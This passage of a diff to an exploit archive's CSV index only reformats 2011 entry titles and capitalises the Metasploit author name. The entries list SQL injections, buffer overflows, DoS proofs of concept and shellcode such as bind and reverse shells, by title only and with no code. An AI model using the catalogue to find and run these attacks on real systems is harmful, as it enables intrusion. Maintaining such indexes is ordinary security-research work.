Tools",php,webapps,0 17062,platforms/php/webapps/17062.txt,"Claroline 1.10 Persistent XSS",2011-03-29,"AutoSec Tools",php,webapps,0 17063,platforms/windows/remote/17063.txt,"easy file sharing Web server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 @@ -14853,7 +14853,7 @@ id,file,description,date,author,platform,type,port 17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service",2011-03-29,"AutoSec Tools",windows,dos,0 17071,platforms/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 -17072,platforms/windows/dos/17072.py,"Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC",2011-03-29,BraniX,windows,dos,0 +17072,platforms/windows/dos/17072.py,"Windows Explorer 6.0.2900.5512 - (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC",2011-03-29,BraniX,windows,dos,0 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 AVI DoS PoC",2011-03-30,BraniX,windows,dos,0 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha - Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 @@ -14864,7 +14864,7 @@ id,file,description,date,author,platform,type,port 17081,platforms/asp/webapps/17081.txt,"CosmoQuest Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - (.ZIP) Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 -17084,platforms/php/webapps/17084.txt,"Andy's PHP Knowledgebase 0.95.2 (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 +17084,platforms/php/webapps/17084.txt,"Andy's PHP Knowledgebase 0.95.2 - (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup",2011-03-31,KedAns-Dz,php,webapps,0 17086,platforms/windows/local/17086.pl,"Word List Builder Buffer Overflow Exploit (SEH)",2011-04-01,h1ch4m,windows,local,0 17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer overflow/DOS Exploit (0Day)",2011-04-01,^Xecuti0N3r,windows,dos,0 @@ -14880,9 +14880,9 @@ id,file,description,date,author,platform,type,port 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - XSS",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - CSRF",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 news.php (id) SQL Injection news.php (id)",2011-04-02,"Easy Laster",php,webapps,0 -17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 (regist.php) SQL Injection Vulnerabiility",2011-04-02,"Easy Laster",php,webapps,0 -17102,platforms/php/webapps/17102.txt,"Anzeigenmarkt 2011 (index.php) SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 -17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 (index.php) SQL Injection",2011-04-03,keracker,php,webapps,0 +17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 - (regist.php) SQL Injection Vulnerabiility",2011-04-02,"Easy Laster",php,webapps,0 +17102,platforms/php/webapps/17102.txt,"Anzeigenmarkt 2011 - (index.php) SQL Injection",2011-04-02,"Easy Laster",php,webapps,0 +17103,platforms/php/webapps/17103.txt,"Advanced Image Hosting 2.2 - (index.php) SQL Injection",2011-04-03,keracker,php,webapps,0 17104,platforms/windows/remote/17104.txt,"RealNetworks RealGames StubbyUtil.ShellCtl.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 17105,platforms/windows/remote/17105.txt,"RealNetworks RealGames StubbyUtil.ProcessMgr.1 - ActiveX Control Multiple Remote Command Execution",2011-04-03,rgod,windows,remote,0 17106,platforms/php/webapps/17106.txt,"Rash CMS SQL Injection",2011-04-03,keracker,php,webapps,0 @@ -14908,7 +14908,7 @@ id,file,description,date,author,platform,type,port 17127,platforms/php/webapps/17127.txt,"eyeos 2.3 - Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",php,webapps,0 17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b - LFI",2011-04-07,Osirys,php,webapps,0 -17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 +17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - afd.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 @@ -14925,12 +14925,12 @@ id,file,description,date,author,platform,type,port 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip File) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local,0 -17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001 -17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,metasploit,windows,remote,0 -17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,metasploit,windows,local,0 -17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,metasploit,windows,remote,25 -17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,metasploit,windows,remote,9090 -17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro <= 1.70 - (.visprj) Buffer Overflow",2011-04-11,metasploit,windows,local,0 +17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,Metasploit,multiple,remote,10001 +17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,Metasploit,windows,remote,0 +17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,Metasploit,windows,local,0 +17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,Metasploit,windows,remote,25 +17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,Metasploit,windows,remote,9090 +17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro <= 1.70 - (.visprj) Buffer Overflow",2011-04-11,Metasploit,windows,local,0 17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - (.ord) Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",windows,local,0 @@ -14949,14 +14949,14 @@ id,file,description,date,author,platform,type,port 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit",2011-04-15,bitform,multiple,webapps,0 -17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption",2011-04-16,metasploit,windows,remote,0 +17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload",2011-04-16,Alexander,asp,webapps,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection",2011-04-17,"vir0e5 ",php,webapps,0 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow Exploit",2011-04-18,sickness,windows,local,0 -17186,platforms/windows/local/17186.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,metasploit,windows,local,0 +17186,platforms/windows/local/17186.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 @@ -14964,8 +14964,8 @@ id,file,description,date,author,platform,type,port 17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 - Multiple CSRF Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 -17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,metasploit,windows,remote,0 -17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,metasploit,unix,remote,0 +17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,Metasploit,windows,remote,0 +17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,Metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS",2011-04-22,Saif,php,webapps,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 17202,platforms/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 @@ -14982,21 +14982,21 @@ id,file,description,date,author,platform,type,port 17216,platforms/php/webapps/17216.txt,"Quick.CMS 3.0 - CSRF Vulnerabilities",2011-04-26,^Xecuti0N3r,php,webapps,0 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 -17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,metasploit,windows,remote,18821 +17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,Metasploit,windows,remote,18821 17220,platforms/php/webapps/17220.txt,"eyeos <= 1.9.0.2 - Stored XSS using image files",2011-04-28,"Alberto Ortega",php,webapps,0 17221,platforms/php/webapps/17221.txt,"kusaba x <= 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"libmodplug <= 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 17224,platforms/osx/shellcode/17224.s,"OS-X/Intel - reverse_tcp shell x86_64 shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 -17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - (.m3u) SEH Unicode Buffer Overflow",2011-04-28,metasploit,windows,local,0 +17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - (.m3u) SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0 17227,platforms/windows/dos/17227.py,"Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC",2011-04-29,webDEViL,windows,dos,0 17228,platforms/asp/webapps/17228.txt,"SOOP Portal Raven 1.0b SQL Injection",2011-04-29,Evil-Thinker,asp,webapps,0 -17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 - (.s3m) Stack Buffer Overflow",2011-04-30,metasploit,windows,local,0 -17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - (.s3m) Stack Buffer Overflow",2011-04-30,metasploit,windows,local,0 +17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 +17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,php,webapps,0 -17243,platforms/windows/remote/17243.txt,"SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit",2011-05-04,xsploitedsec,windows,remote,0 -17317,platforms/windows/local/17317.rb,"VisiWave VWR File Parsing Trusted Pointer",2011-05-23,metasploit,windows,local,0 +17243,platforms/windows/remote/17243.txt,"SPlayer <= 3.7 - (build 2055) Buffer Overflow Exploit",2011-05-04,xsploitedsec,windows,remote,0 +17317,platforms/windows/local/17317.rb,"VisiWave VWR File Parsing Trusted Pointer",2011-05-23,Metasploit,windows,local,0 17318,platforms/multiple/local/17318.php,"PHP <= 5.3.5 - socket_connect() Buffer Overflow",2011-05-25,"Marek Kroemeke",multiple,local,0 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 17319,platforms/php/webapps/17319.txt,"Tickets 2.13 SQL Injection",2011-05-25,"AutoSec Tools",php,webapps,0 @@ -15011,24 +15011,24 @@ id,file,description,date,author,platform,type,port 17248,platforms/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17250,platforms/php/webapps/17250.txt,"phpThumb 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps,0 17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - CSRF",2011-05-06,"High-Tech Bridge SA",php,webapps,0 -17252,platforms/windows/remote/17252.rb,"VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,metasploit,windows,remote,0 +17252,platforms/windows/remote/17252.rb,"VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,Metasploit,windows,remote,0 17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0 17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning - SQLi",2011-05-09,the_cyber_nuxbie,php,webapps,0 17265,platforms/php/webapps/17265.txt,"Joomla Component com_hello SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0 -17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,metasploit,windows,remote,0 -17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,metasploit,windows,remote,0 +17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,Metasploit,windows,remote,0 +17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,Metasploit,windows,remote,0 17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit (SEH)",2011-05-11,h1ch4m,windows,local,0 17277,platforms/windows/local/17277.pl,"A-PDF Wav to MP3 Converter 1.2.0 - DEP Bypass",2011-05-13,h1ch4m,windows,local,0 -17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC",2011-05-13,LiquidWorm,windows,dos,0 +17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 - (build 7283) Session File Handling Buffer Overflow PoC",2011-05-13,LiquidWorm,windows,dos,0 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences (0Day)",2011-05-12,"Stefan LE BERRE",windows,dos,0 17274,platforms/windows/dos/17274.txt,"SlimPDF Reader PoC",2011-05-12,"Nicolas Krassas",windows,dos,0 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download",2011-05-13,LiquidWorm,hardware,remote,0 17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 -17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload",2011-05-14,"Number 7",php,webapps,0 +17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Remote File Upload",2011-05-14,"Number 7",php,webapps,0 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0 17289,platforms/php/webapps/17289.txt,"frame-oshop SQL Injection",2011-05-15,-SmoG-,php,webapps,0 @@ -15042,7 +15042,7 @@ id,file,description,date,author,platform,type,port 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - LFI",2011-05-16,"AutoSec Tools",php,webapps,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - DoS",2011-05-16,nSense,netware,dos,0 17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human <= 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 -17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,metasploit,windows,remote,0 +17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,Metasploit,windows,remote,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 - (.m3u) Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0 17303,platforms/php/webapps/17303.txt,"Joomla 1.0 Component jDownloads - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0 @@ -15054,14 +15054,14 @@ id,file,description,date,author,platform,type,port 17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0 17311,platforms/php/webapps/17311.txt,"E-Manage MySchool 7.02 SQL Injection",2011-05-21,az7rb,php,webapps,0 17312,platforms/php/webapps/17312.txt,"tugux CMS 1.2 - Multiple Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 -17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow",2011-05-22,metasploit,windows,local,0 +17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow",2011-05-22,Metasploit,windows,local,0 17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x <= 4.1.2 - (search.php) SQL Injection",2011-05-23,D4rkB1t,php,webapps,0 17316,platforms/php/webapps/17316.txt,"PHPortfolio SQL Injection Vulnerbility",2011-05-23,lionaneesh,php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - LFI",2011-05-25,"AutoSec Tools",php,webapps,0 -17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 +17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 - (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 17322,platforms/php/webapps/17322.txt,"egroupware 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 -17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,metasploit,php,webapps,0 +17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,Metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode",2011-05-26,"Alexey Sintsov",windows,shellcode,0 17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection",2011-05-27,takeshix,php,webapps,0 @@ -15071,7 +15071,7 @@ id,file,description,date,author,platform,type,port 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection",2011-05-28,M.Jock3R,php,webapps,0 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,php,webapps,0 17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0 -17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller Local File Inclusion",2011-05-28,Valentin,php,webapps,0 +17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller - Local File Inclusion",2011-05-28,Valentin,php,webapps,0 17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0 17341,platforms/php/webapps/17341.txt,"Joomla Component com_joomnik SQL Injection",2011-05-29,SOLVER,php,webapps,0 17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0 @@ -15081,10 +15081,10 @@ id,file,description,date,author,platform,type,port 17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 Exploit",2011-05-30,Aodrulez,hardware,webapps,0 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injection Vulnerabilities",2011-05-30,v3n0m,php,webapps,0 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 -17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,metasploit,windows,remote,0 +17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,Metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 -17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21 +17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,Metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 @@ -15094,29 +15094,29 @@ id,file,description,date,author,platform,type,port 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - (.zip) Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0 17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 17365,platforms/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM Exploit",2011-06-07,"Jeremy Brown",windows,remote,0 -17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",2011-06-06,metasploit,windows,remote,0 +17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface Local File Include",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP Remote BoF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 -17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,metasploit,windows,remote,0 +17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS SQL Injection Exploit",2011-06-09,Sideswipe,asp,webapps,0 17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i Web Interface Data disclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone Web Interface Data Diclosure",2011-06-09,"Yakir Wizman",hardware,webapps,0 -17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 -17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 (l param) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 +17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 - (rm) Remote Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 +17379,platforms/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - 